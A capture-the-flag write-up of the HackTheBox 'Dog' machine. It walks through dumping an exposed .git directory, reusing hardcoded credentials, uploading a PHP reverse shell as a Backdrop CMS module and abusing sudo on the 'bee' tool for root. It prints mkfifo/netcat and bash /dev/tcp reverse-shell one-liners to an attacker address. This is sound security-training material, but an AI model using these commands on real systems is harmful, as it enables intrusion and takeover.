All write-ups
5 min read

HackTheBox: Dog Writeup

HackTheBoxLinuxGit DumperBackdrop CMSSudo ExploitationPHP

HackTheBox: Dog

Overview

Dog is a Linux machine hosting a Backdrop CMS application. Initial access involves discovering an exposed .git directory, dumping its contents to find hardcoded credentials, and exploiting a CMS vulnerability to establish a reverse shell. Privilege escalation is accomplished by abusing sudo privileges on a PHP administration tool.

Initial Enumeration

The Nmap scan reveals SSH (22) and an Apache web server (80) running Backdrop CMS. Nmap's http-git script identifies an exposed .git directory at the root of the server.

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!

We map dog.htb to our /etc/hosts file and proceed to extract the repository.

Dumping the Git Repository

Using git-dumper, we extract the source code from the exposed .git directory:

pipx install git-dumper
git-dumper http://dog.htb/.git website

Inspecting the extracted codebase, we locate a configuration file (settings.php) containing hardcoded credentials for a user named tiffany:

Password: [REDACTED]

Initial Access: Backdrop CMS RCE

Logging into the Backdrop CMS administrative panel as tiffany, we can exploit an authenticated Remote Code Execution vulnerability. Backdrop CMS allows installing modules, which can be abused to upload malicious PHP code.

We pack a PHP reverse shell into a .tar archive:

tar czf shell.tar shell

After uploading it via /admin/modules/install, we trigger the shell by navigating to /modules/shell/shell.php?cmd=.... To establish an interactive connection, we execute a reverse shell payload:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.242 4444 > /tmp/f

Lateral Movement

Checking the /home directory, we discover another user, johncusack. Performing a quick password spray or reusing the discovered password grants us SSH access as johncusack, allowing us to retrieve the user flag.

johncusack@dog:~$ cat user.txt
[REDACTED]

Privilege Escalation: Sudo Abuse

Investigating sudo privileges for johncusack, we find that while standard sudo su fails, the user is permitted to execute a specific administrative binary, /usr/local/bin/bee, without a password.

sudo /usr/local/bin/bee --help

bee is a command-line tool for Backdrop CMS that supports executing arbitrary PHP code using the eval argument. We leverage this functionality to spawn a reverse shell running as root.

sudo /usr/local/bin/bee --root=/var/www/html eval "echo shell_exec('bash -c \"bash -i >& /dev/tcp/10.10.14.242/4444 0>&1\"');"

The listener catches the connection, granting root access and the final flag.

root@dog:~# cat root.txt
[REDACTED]